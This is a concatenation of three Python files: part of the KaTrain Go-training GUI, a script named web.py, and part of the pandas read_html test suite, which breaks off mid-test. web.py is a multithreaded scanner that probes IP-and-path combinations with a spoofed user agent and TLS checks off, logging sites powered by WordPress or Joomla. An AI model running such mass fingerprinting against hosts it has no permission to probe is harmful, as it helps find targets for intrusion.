self._do_update_state()
except Exception as exc:
self.log(f"Exception in processing message {msg} {args}: {exc}", OUTPUT_ERROR)
traceback.print_exc()
def __call__(self, message, *args, **kwargs):
if self.game:
if message.endswith("popup"): # gui code needs to run in main kivy thread.
if self.contributing and "save" not in message and message != "contribute-popup":
self.controls.set_status(
i18n._("gui-locked").format(action=message), STATUS_INFO, check_level=False
)
return
fn = getattr(self, f"_do_{message.replace('-', '_')}")
Clock.schedule_once(lambda _dt: fn(*args, **kwargs), -1)
else: # game related actions
self.message_queue.put([self.game.game_id, message, args, kwargs])
def _do_new_game(self, move_tree=None, analyze_fast=False, sgf_filename=None):
self.pondering = False
mode = self.play_analyze_mode
if (move_tree is not None and mode == MODE_PLAY) or (move_tree is None and mode == MODE_ANALYZE):
self.play_mode.switch_ui_mode() # for new game, go to play, for loaded, analyze
self.board_gui.animating_pv = None
self.engine.on_new_game() # clear queries
self.game = Game(
self,
self.engine,
move_tree=move_tree,
analyze_fast=analyze_fast or not move_tree,
sgf_filename=sgf_filename,
)
for bw, player_info in self.players_info.items():
player_info.sgf_rank = self.game.root.get_property(bw + "R")
player_info.calculated_rank = None
if sgf_filename is not None: # load game->no ai player
player_info.player_type = PLAYER_HUMAN
player_info.player_subtype = PLAYING_NORMAL
self.update_player(bw, player_type=player_info.player_type, player_subtype=player_info.player_subtype)
self.controls.graph.initialize_from_game(self.game.root)
self.update_state(redraw_board=True)
def _do_katago_contribute(self):
if self.contributing and not self.engine.server_error and self.engine.katago_process is not None:
return
self.contributing = self.animate_contributing = True # special mode
if self.play_analyze_mode == MODE_PLAY: # switch to analysis view
self.play_mode.switch_ui_mode()
self.pondering = False
self.board_gui.animating_pv = None
for bw, player_info in self.players_info.items():
self.update_player(bw, player_type=PLAYER_AI, player_subtype=AI_DEFAULT)
self.engine.shutdown(finish=False)
self.engine = KataGoContributeEngine(self)
self.game = BaseGame(self)
def _do_insert_mode(self, mode="toggle"):
self.game.set_insert_mode(mode)
if self.play_analyze_mode != MODE_ANALYZE:
self.play_mode.switch_ui_mode()
def _do_ai_move(self, node=None):
if node is None or self.game.current_node == node:
mode = self.next_player_info.strategy
settings = self.config(f"ai/{mode}")
if settings is not None:
generate_ai_move(self.game, mode, settings)
else:
self.log(f"AI Mode {mode} not found!", OUTPUT_ERROR)
def _do_undo(self, n_times=1):
if n_times == "smart":
n_times = 1
if self.play_analyze_mode == MODE_PLAY and self.last_player_info.ai and self.next_player_info.human:
n_times = 2
self.board_gui.animating_pv = None
self.game.undo(n_times)
def _do_reset_analysis(self):
self.game.reset_current_analysis()
def _do_resign(self):
self.game.current_node.end_state = f"{self.game.current_node.player}+R"
def _do_redo(self, n_times=1):
self.board_gui.animating_pv = None
self.game.redo(n_times)
def _do_find_mistake(self, fn="redo"):
self.board_gui.animating_pv = None
getattr(self.game, fn)(9999, stop_on_mistake=self.config("trainer/eval_thresholds")[-4])
def _do_switch_branch(self, *args):
self.board_gui.animating_pv = None
self.controls.move_tree.switch_branch(*args)
def _do_play(self, coords):
self.board_gui.animating_pv = None
try:
self.game.play(Move(coords, player=self.next_player_info.player))
except IllegalMoveException as e:
self.controls.set_status(f"Illegal Move: {str(e)}", STATUS_ERROR)
def _do_analyze_extra(self, mode, **kwargs):
self.game.analyze_extra(mode, **kwargs)
def _do_selfplay_setup(self, until_move, target_b_advantage=None):
self.game.selfplay(int(until_move) if isinstance(until_move, float) else until_move, target_b_advantage)
def _do_select_box(self):
self.controls.set_status(i18n._("analysis:region:start"), STATUS_INFO)
self.board_gui.selecting_region_of_interest = True
def _do_new_game_popup(self):
self.controls.timer.paused = True
if not self.new_game_popup:
self.new_game_popup = I18NPopup(
title_key="New Game title", size=[dp(800), dp(900)], content=NewGamePopup(self)
).__self__
self.new_game_popup.content.popup = self.new_game_popup
self.new_game_popup.open()
self.new_game_popup.content.update_from_current_game()
def _do_timer_popup(self):
self.controls.timer.paused = True
if not self.timer_settings_popup:
self.timer_settings_popup = I18NPopup(
title_key="timer settings", size=[dp(600), dp(500)], content=ConfigTimerPopup(self)
).__self__
self.timer_settings_popup.content.popup = self.timer_settings_popup
self.timer_settings_popup.open()
def _do_teacher_popup(self):
self.controls.timer.paused = True
if not self.teacher_settings_popup:
self.teacher_settings_popup = I18NPopup(
title_key="teacher settings", size=[dp(800), dp(800)], content=ConfigTeacherPopup(self)
).__self__
self.teacher_settings_popup.content.popup = self.teacher_settings_popup
self.teacher_settings_popup.open()
def _do_config_popup(self):
self.controls.timer.paused = True
if not self.config_popup:
self.config_popup = I18NPopup(
title_key="general settings title", size=[dp(1200), dp(950)], content=ConfigPopup(self)
).__self__
self.config_popup.content.popup = self.config_popup
self.config_popup.title += ": " + self.config_file
self.config_popup.open()
def _do_contribute_popup(self):
if not self.contribute_popup:
self.contribute_popup = I18NPopup(
title_key="contribute settings title", size=[dp(1100), dp(800)], content=ContributePopup(self)
).__self__
self.contribute_popup.content.popup = self.contribute_popup
self.contribute_popup.open()
def _do_ai_popup(self):
self.controls.timer.paused = True
if not self.ai_settings_popup:
self.ai_settings_popup = I18NPopup(
title_key="ai settings", size=[dp(750), dp(750)], content=ConfigAIPopup(self)
).__self__
self.ai_settings_popup.content.popup = self.ai_settings_popup
self.ai_settings_popup.open()
def _do_engine_recovery_popup(self, error_message, code):
current_open = self.popup_open
if current_open and isinstance(current_open.content, EngineRecoveryPopup):
self.log(f"Not opening engine recovery popup with {error_message} as one is already open", OUTPUT_DEBUG)
return
popup = I18NPopup(
title_key="engine recovery",
size=[dp(600), dp(700)],
content=EngineRecoveryPopup(self, error_message=error_message, code=code),
).__self__
popup.content.popup = popup
popup.open()
def play_mistake_sound(self, node):
if self.config("timer/sound") and node.played_sound is None and Theme.MISTAKE_SOUNDS:
node.played_sound = True
play_sound(random.choice(Theme.MISTAKE_SOUNDS))
def load_sgf_file(self, file, fast=False, rewind=True):
if self.contributing:
return
try:
file = os.path.abspath(file)
move_tree = KaTrainSGF.parse_file(file)
except (ParseError, FileNotFoundError) as e:
self.log(i18n._("Failed to load SGF").format(error=e), OUTPUT_ERROR)
return
self._do_new_game(move_tree=move_tree, analyze_fast=fast, sgf_filename=file)
if not rewind:
self.game.redo(999)
def _do_analyze_sgf_popup(self):
if not self.fileselect_popup:
popup_contents = LoadSGFPopup(self)
popup_contents.filesel.path = os.path.abspath(os.path.expanduser(self.config("general/sgf_load", ".")))
self.fileselect_popup = I18NPopup(
title_key="load sgf title", size=[dp(1200), dp(800)], content=popup_contents
).__self__
def readfile(*_args):
filename = popup_contents.filesel.filename
self.fileselect_popup.dismiss()
path, file = os.path.split(filename)
if path != self.config("general/sgf_load"):
self.log(f"Updating sgf load path default to {path}", OUTPUT_DEBUG)
self._config["general"]["sgf_load"] = path
popup_contents.update_config(False)
self.save_config("general")
self.load_sgf_file(filename, popup_contents.fast.active, popup_contents.rewind.active)
popup_contents.filesel.on_success = readfile
popup_contents.filesel.on_submit = readfile
self.fileselect_popup.open()
self.fileselect_popup.content.filesel.ids.list_view._trigger_update()
def _do_save_game(self, filename=None):
filename = filename or self.game.sgf_filename
if not filename:
return self("save-game-as-popup")
try:
msg = self.game.write_sgf(filename)
self.log(msg, OUTPUT_INFO)
self.controls.set_status(msg, STATUS_INFO, check_level=False)
except Exception as e:
self.log(f"Failed to save SGF to {filename}: {e}", OUTPUT_ERROR)
def _do_save_game_as_popup(self):
popup_contents = SaveSGFPopup(suggested_filename=self.game.generate_filename())
save_game_popup = I18NPopup(
title_key="save sgf title", size=[dp(1200), dp(800)], content=popup_contents
).__self__
def readfile(*_args):
filename = popup_contents.filesel.filename
if not filename.lower().endswith(".sgf"):
filename += ".sgf"
save_game_popup.dismiss()
path, file = os.path.split(filename.strip())
if not path:
path = popup_contents.filesel.path # whatever dir is shown
if path != self.config("general/sgf_save"):
self.log(f"Updating sgf save path default to {path}", OUTPUT_DEBUG)
self._config["general"]["sgf_save"] = path
self.save_config("general")
self._do_save_game(os.path.join(path, file))
popup_contents.filesel.on_success = readfile
popup_contents.filesel.on_submit = readfile
save_game_popup.open()
def load_sgf_from_clipboard(self):
clipboard = Clipboard.paste()
if not clipboard:
self.controls.set_status("Ctrl-V pressed but clipboard is empty.", STATUS_INFO)
return
url_match = re.match(r"(?P<url>https?://[^\s]+)", clipboard)
if url_match:
self.log("Recognized url: " + url_match.group(), OUTPUT_INFO)
http = urllib3.PoolManager()
response = http.request("GET", url_match.group())
clipboard = response.data.decode("utf-8")
try:
move_tree = KaTrainSGF.parse_sgf(clipboard)
except Exception as exc:
self.controls.set_status(
i18n._("Failed to import from clipboard").format(error=exc, contents=clipboard[:50]), STATUS_INFO
)
return
move_tree.nodes_in_tree[-1].analyze(
self.engine, analyze_fast=False
) # speed up result for looking at end of game
self._do_new_game(move_tree=move_tree, analyze_fast=True)
self("redo", 9999)
self.log("Imported game from clipboard.", OUTPUT_INFO)
def on_touch_up(self, touch):
if touch.is_mouse_scrolling:
touching_board = self.board_gui.collide_point(*touch.pos) or self.board_controls.collide_point(*touch.pos)
touching_control_nonscroll = self.controls.collide_point(
*touch.pos
) and not self.controls.notes_panel.collide_point(*touch.pos)
if self.board_gui.animating_pv is not None and touching_board:
if touch.button == "scrollup":
self.board_gui.adjust_animate_pv_index(1)
elif touch.button == "scrolldown":
self.board_gui.adjust_animate_pv_index(-1)
elif touching_board or touching_control_nonscroll: # scroll through moves
if touch.button == "scrollup":
self("redo")
elif touch.button == "scrolldown":
self("undo")
return super().on_touch_up(touch)
@property
def shortcuts(self):
return {
k: v
for ks, v in [
(Theme.KEY_ANALYSIS_CONTROLS_SHOW_CHILDREN, self.analysis_controls.show_children),
(Theme.KEY_ANALYSIS_CONTROLS_EVAL, self.analysis_controls.eval),
(Theme.KEY_ANALYSIS_CONTROLS_HINTS, self.analysis_controls.hints),
(Theme.KEY_ANALYSIS_CONTROLS_OWNERSHIP, self.analysis_controls.ownership),
(Theme.KEY_ANALYSIS_CONTROLS_POLICY, self.analysis_controls.policy),
(Theme.KEY_AI_MOVE, ("ai-move",)),
(Theme.KEY_ANALYZE_EXTRA_EXTRA, ("analyze-extra", "extra")),
(Theme.KEY_ANALYZE_EXTRA_EQUALIZE, ("analyze-extra", "equalize")),
(Theme.KEY_ANALYZE_EXTRA_SWEEP, ("analyze-extra", "sweep")),
(Theme.KEY_ANALYZE_EXTRA_ALTERNATIVE, ("analyze-extra", "alternative")),
(Theme.KEY_SELECT_BOX, ("select-box",)),
(Theme.KEY_RESET_ANALYSIS, ("reset-analysis",)),
(Theme.KEY_INSERT_MODE, ("insert-mode",)),
(Theme.KEY_PASS, ("play", None)),
(Theme.KEY_SELFPLAY_TO_END, ("selfplay-setup", "end", None)),
(Theme.KEY_NAV_PREV_BRANCH, ("undo", "branch")),
(Theme.KEY_NAV_BRANCH_DOWN, ("switch-branch", 1)),
(Theme.KEY_NAV_BRANCH_UP, ("switch-branch", -1)),
(Theme.KEY_TIMER_POPUP, ("timer-popup",)),
(Theme.KEY_TEACHER_POPUP, ("teacher-popup",)),
(Theme.KEY_AI_POPUP, ("ai-popup",)),
(Theme.KEY_CONFIG_POPUP, ("config-popup",)),
(Theme.KEY_CONTRIBUTE_POPUP, ("contribute-popup",)),
(Theme.KEY_STOP_ANALYSIS, ("analyze-extra", "stop")),
]
for k in (ks if isinstance(ks, list) else [ks])
}
@property
def popup_open(self) -> Popup:
app = App.get_running_app()
if app:
first_child = app.root_window.children[0]
return first_child if isinstance(first_child, Popup) else None
def _on_keyboard_down(self, _keyboard, keycode, _text, modifiers):
self.last_key_down = keycode
ctrl_pressed = "ctrl" in modifiers or ("meta" in modifiers and kivy_platform == "macosx")
shift_pressed = "shift" in modifiers
if self.controls.note.focus:
return # when making notes, don't allow keyboard shortcuts
popup = self.popup_open
if popup:
if keycode[1] in [
Theme.KEY_DEEPERANALYSIS_POPUP,
Theme.KEY_REPORT_POPUP,
Theme.KEY_TIMER_POPUP,
Theme.KEY_TEACHER_POPUP,
Theme.KEY_AI_POPUP,
Theme.KEY_CONFIG_POPUP,
Theme.KEY_CONTRIBUTE_POPUP,
]: # switch between popups
popup.dismiss()
return
elif keycode[1] in Theme.KEY_SUBMIT_POPUP:
fn = getattr(popup.content, "on_submit", None)
if fn:
fn()
return
else:
return
if keycode[1] == Theme.KEY_TOGGLE_CONTINUOUS_ANALYSIS:
self.toggle_continuous_analysis()
elif keycode[1] == Theme.KEY_TOGGLE_COORDINATES:
self.board_gui.toggle_coordinates()
elif keycode[1] in Theme.KEY_PAUSE_TIMER and not ctrl_pressed:
self.controls.timer.paused = not self.controls.timer.paused
elif keycode[1] in Theme.KEY_ZEN:
self.zen = (self.zen + 1) % 3
elif keycode[1] in Theme.KEY_NAV_PREV:
self("undo", 1 + shift_pressed * 9 + ctrl_pressed * 9999)
elif keycode[1] in Theme.KEY_NAV_NEXT:
self("redo", 1 + shift_pressed * 9 + ctrl_pressed * 9999)
elif keycode[1] == Theme.KEY_NAV_GAME_START:
self("undo", 9999)
elif keycode[1] == Theme.KEY_NAV_GAME_END:
self("redo", 9999)
elif keycode[1] == Theme.KEY_MOVE_TREE_MAKE_SELECTED_NODE_MAIN_BRANCH:
self.controls.move_tree.make_selected_node_main_branch()
elif keycode[1] == Theme.KEY_NAV_MISTAKE and not ctrl_pressed:
self("find-mistake", "undo" if shift_pressed else "redo")
elif keycode[1] == Theme.KEY_MOVE_TREE_DELETE_SELECTED_NODE and ctrl_pressed:
self.controls.move_tree.delete_selected_node()
elif keycode[1] == Theme.KEY_MOVE_TREE_TOGGLE_SELECTED_NODE_COLLAPSE and not ctrl_pressed:
self.controls.move_tree.toggle_selected_node_collapse()
elif keycode[1] == Theme.KEY_NEW_GAME and ctrl_pressed:
self("new-game-popup")
elif keycode[1] == Theme.KEY_LOAD_GAME and ctrl_pressed:
self("analyze-sgf-popup")
elif keycode[1] == Theme.KEY_SAVE_GAME and ctrl_pressed:
self("save-game")
elif keycode[1] == Theme.KEY_SAVE_GAME_AS and ctrl_pressed:
self("save-game-as-popup")
elif keycode[1] == Theme.KEY_COPY and ctrl_pressed:
Clipboard.copy(self.game.root.sgf())
self.controls.set_status(i18n._("Copied SGF to clipboard."), STATUS_INFO)
elif keycode[1] == Theme.KEY_PASTE and ctrl_pressed:
self.load_sgf_from_clipboard()
elif keycode[1] == Theme.KEY_NAV_PREV_BRANCH and shift_pressed:
self("undo", "main-branch")
elif keycode[1] == Theme.KEY_DEEPERANALYSIS_POPUP:
self.analysis_controls.dropdown.open_game_analysis_popup()
elif keycode[1] == Theme.KEY_REPORT_POPUP:
self.analysis_controls.dropdown.open_report_popup()
elif keycode[1] == "f10" and self.debug_level >= OUTPUT_EXTRA_DEBUG:
import yappi
yappi.set_clock_type("cpu")
yappi.start()
self.log("starting profiler", OUTPUT_ERROR)
elif keycode[1] == "f11" and self.debug_level >= OUTPUT_EXTRA_DEBUG:
import time
import yappi
stats = yappi.get_func_stats()
filename = f"callgrind.{int(time.time())}.prof"
stats.save(filename, type="callgrind")
self.log(f"wrote profiling results to {filename}", OUTPUT_ERROR)
elif not ctrl_pressed:
shortcut = self.shortcuts.get(keycode[1])
if shortcut is not None:
if isinstance(shortcut, Widget):
shortcut.trigger_action(duration=0)
else:
self(*shortcut)
def _on_keyboard_up(self, _keyboard, keycode):
if keycode[1] in ["alt", "tab"]:
Clock.schedule_once(lambda *_args: self._single_key_action(keycode), 0.05)
def _single_key_action(self, keycode):
if (
self.controls.note.focus
or self.popup_open
or keycode != self.last_key_down
or time.time() - self.last_focus_event < 0.2 # this is here to prevent alt-tab from firing alt or tab
):
return
if keycode[1] == "alt":
self.nav_drawer.set_state("toggle")
elif keycode[1] == "tab":
self.play_mode.switch_ui_mode()
class KaTrainApp(MDApp):
gui = ObjectProperty(None)
language = StringProperty(DEFAULT_LANGUAGE)
def __init__(self):
super().__init__()
def build(self):
self.icon = ICON # how you're supposed to set an icon
self.title = f"KaTrain v{VERSION}"
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "Gray"
self.theme_cls.primary_hue = "200"
kv_file = find_package_resource("katrain/gui.kv")
popup_kv_file = find_package_resource("katrain/popups.kv")
resource_add_path(PATHS["PACKAGE"] + "/fonts")
resource_add_path(PATHS["PACKAGE"] + "/sounds")
resource_add_path(PATHS["PACKAGE"] + "/img")
resource_add_path(os.path.abspath(os.path.expanduser(DATA_FOLDER))) # prefer resources in .katrain
theme_files = glob.glob(os.path.join(os.path.expanduser(DATA_FOLDER), "theme*.json"))
for theme_file in sorted(theme_files):
try:
with open(theme_file) as f:
theme_overrides = json.load(f)
for k, v in theme_overrides.items():
setattr(Theme, k, v)
print(f"[{theme_file}] Found theme override {k} = {v}")
except Exception as e: # noqa E722
print(f"Failed to load theme file {theme_file}: {e}")
Theme.DEFAULT_FONT = resource_find(Theme.DEFAULT_FONT)
Builder.load_file(kv_file)
Window.bind(on_request_close=self.on_request_close)
Window.bind(on_dropfile=lambda win, file: self.gui.load_sgf_file(file.decode("utf8")))
self.gui = KaTrainGui()
Builder.load_file(popup_kv_file)
win_left = win_top = win_size = None
if self.gui.config("ui_state/restoresize", True):
win_size = self.gui.config("ui_state/size", [])
win_left = self.gui.config("ui_state/left", None)
win_top = self.gui.config("ui_state/top", None)
if not win_size:
window_scale_fac = 1
try:
from screeninfo import get_monitors
for m in get_monitors():
window_scale_fac = min(window_scale_fac, (m.height - 100) / 1000, (m.width - 100) / 1300)
except Exception as e:
window_scale_fac = 0.85
win_size = [1300 * window_scale_fac, 1000 * window_scale_fac]
self.gui.log(f"Setting window size to {win_size} and position to {[win_left, win_top]}", OUTPUT_DEBUG)
Window.size = (win_size[0], win_size[1])
if win_left is not None and win_top is not None:
Window.left = win_left
Window.top = win_top
return self.gui
def on_language(self, _instance, language):
self.gui.log(f"Switching language to {language}", OUTPUT_INFO)
i18n.switch_lang(language)
self.gui._config["general"]["lang"] = language
self.gui.save_config()
if self.gui.game:
self.gui.update_state()
self.gui.controls.set_status("", STATUS_INFO)
def webbrowser(self, site_key):
websites = {
"homepage": HOMEPAGE + "#manual",
"support": HOMEPAGE + "#support",
"contribute:signup": "http://katagotraining.org/accounts/signup/",
"engine:help": HOMEPAGE + "/blob/master/ENGINE.md",
}
if site_key in websites:
webbrowser.open(websites[site_key])
def on_start(self):
self.language = self.gui.config("general/lang")
self.gui.start()
def on_request_close(self, *_args, source=None):
if source == "keyboard":
return True # do not close on esc
if getattr(self, "gui", None):
self.gui.play_mode.save_ui_state()
self.gui._config["ui_state"]["size"] = list(Window._size)
self.gui._config["ui_state"]["top"] = Window.top
self.gui._config["ui_state"]["left"] = Window.left
self.gui.save_config("ui_state")
if self.gui.engine:
self.gui.engine.shutdown(finish=None)
def signal_handler(self, _signal, _frame):
if self.gui.debug_level >= OUTPUT_DEBUG:
print("TRACEBACKS")
for threadId, stack in sys._current_frames().items():
print(f"\n# ThreadID: {threadId}")
for filename, lineno, name, line in traceback.extract_stack(stack):
print(f"\tFile: {filename}, line {lineno}, in {name}")
if line:
print(f"\t\t{line.strip()}")
self.stop()
def run_app():
class CrashHandler(ExceptionHandler):
def handle_exception(self, inst):
ex_type, ex, tb = sys.exc_info()
trace = "".join(traceback.format_tb(tb))
app = MDApp.get_running_app()
if app and app.gui:
app.gui.log(
f"Exception {inst.__class__.__name__}: {', '.join(repr(a) for a in inst.args)}\n{trace}",
OUTPUT_ERROR,
)
else:
print(f"Exception {inst.__class__}: {inst.args}\n{trace}")
return ExceptionManager.PASS
ExceptionManager.add_handler(CrashHandler())
app = KaTrainApp()
signal.signal(signal.SIGINT, app.signal_handler)
app.run()
if __name__ == "__main__":
run_app()
|
web.py
|
#!/usr/bin/python3
__author__ = "Flavius Ion"
__email__ = "igflavius@odyssee.ro"
__license__ = "MIT"
__version__ = "v1.3"
import argparse
import requests
import logging
import itertools
import threading
import queue
import sys
import os
import re
from bs4 import BeautifulSoup
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def check_file(file):
"""
Checks if file exists
"""
if not os.path.exists(file):
raise argparse.ArgumentTypeError("{0} does not exist".format(file))
return file
def arguments():
"""
Obviously these are the arguments.
"""
parser = argparse.ArgumentParser(add_help=False, description='Web Scraper ' + __version__)
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument("-i", "--ip", dest="ip", type=check_file, required=True, help='ip list file')
required.add_argument("-p", "--path", dest="path", type=check_file, required=True, help='path list file',)
optional.add_argument("-l", "--log", dest="log", default="results.txt", help="save the results (default: results.txt)")
optional.add_argument("--port", dest="port", type=int, default=80, help="port number (default: 80)")
optional.add_argument("--threads", dest="num_threads", type=int, default=100, help="number of threads (default: 100)")
optional.add_argument("--ssl", dest="ssl", action="store_true", help="use ssl (default: none)")
optional.add_argument("-h", "--help", action="help", help="show this help message and exit")
arg = parser.parse_args()
return arg
def main():
"""
This is where we begin. We create a nested loop with
itertools.product() and we put in the queue().
Set first part to break the loop.
"""
threads = []
num_threads = arg.num_threads
port = str(arg.port)
# Multithread
for thread in range(num_threads):
th = threading.Thread(target = scanner, daemon=True)
threads.append(th)
th.start()
# add url, port and path in queue()
with open(arg.ip) as file1, open(arg.path) as file2:
for url, path in itertools.product(file1, file2):
url = url.rstrip().strip()
path = path.rstrip().strip()
threads_queue.put(url + ":" + port + path)
# add None to the end queue() to break the loop
for thread in threads:
threads_queue.put(None)
for thread in threads:
thread.join()
def scanner():
"""
Get urls from the queue.
And find the keywords in the urls.
And break the loop with an if statment.
"""
logging.basicConfig(format='%(message)s', level=logging.INFO, handlers=[logging.FileHandler(arg.log), logging.StreamHandler(sys.stdout)])
headers = requests.utils.default_headers()
headers.update({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'})
keywords = ["Powered by WordPress", "Powered by Joomla"]
while True:
url = threads_queue.get()
ssl = arg.ssl
if url is None:
break
if ssl is False:
try:
req = requests.get("http://" + url, headers=headers, timeout=3, allow_redirects=True, verify=False)
soup = BeautifulSoup(req.text, 'html.parser')
if soup.find_all(string=re.compile('|'.join(keywords))):
logging.info("http://%s", url)
except requests.RequestException:
pass
else:
try:
req = requests.get("https://" + url, headers=headers, timeout=3, allow_redirects=True, verify=False)
soup = BeautifulSoup(req.text, 'html.parser')
if soup.find_all(string=re.compile('|'.join(keywords))):
logging.info("https://%s", url)
except requests.RequestException:
pass
if __name__ == '__main__':
try:
threads_queue = queue.Queue(maxsize=0)
arg = arguments()
main()
except KeyboardInterrupt:
sys.exit(0)
print("[+] Ctrl + C ... Exiting")
|
test_html.py
|
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture
def spam_data(self, datapath):
return datapath("io", "data", "html", "spam.html")
@pytest.fixture
def banklist_data(self, datapath):
return datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url(self):
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
),
check_before_test=True,
)
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self, banklist_data):
df1 = self.read_html(banklist_data, match=".*Florida.*", attrs={"id": "table"})
df2 = self.read_html(banklist_data, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
def test_spam(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*")
df2 = self.read_html(spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self, spam_data):
dfs = self.read_html(spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self, banklist_data):
dfs = self.read_html(banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self, spam_data):
df = self.read_html(spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self, spam_data):
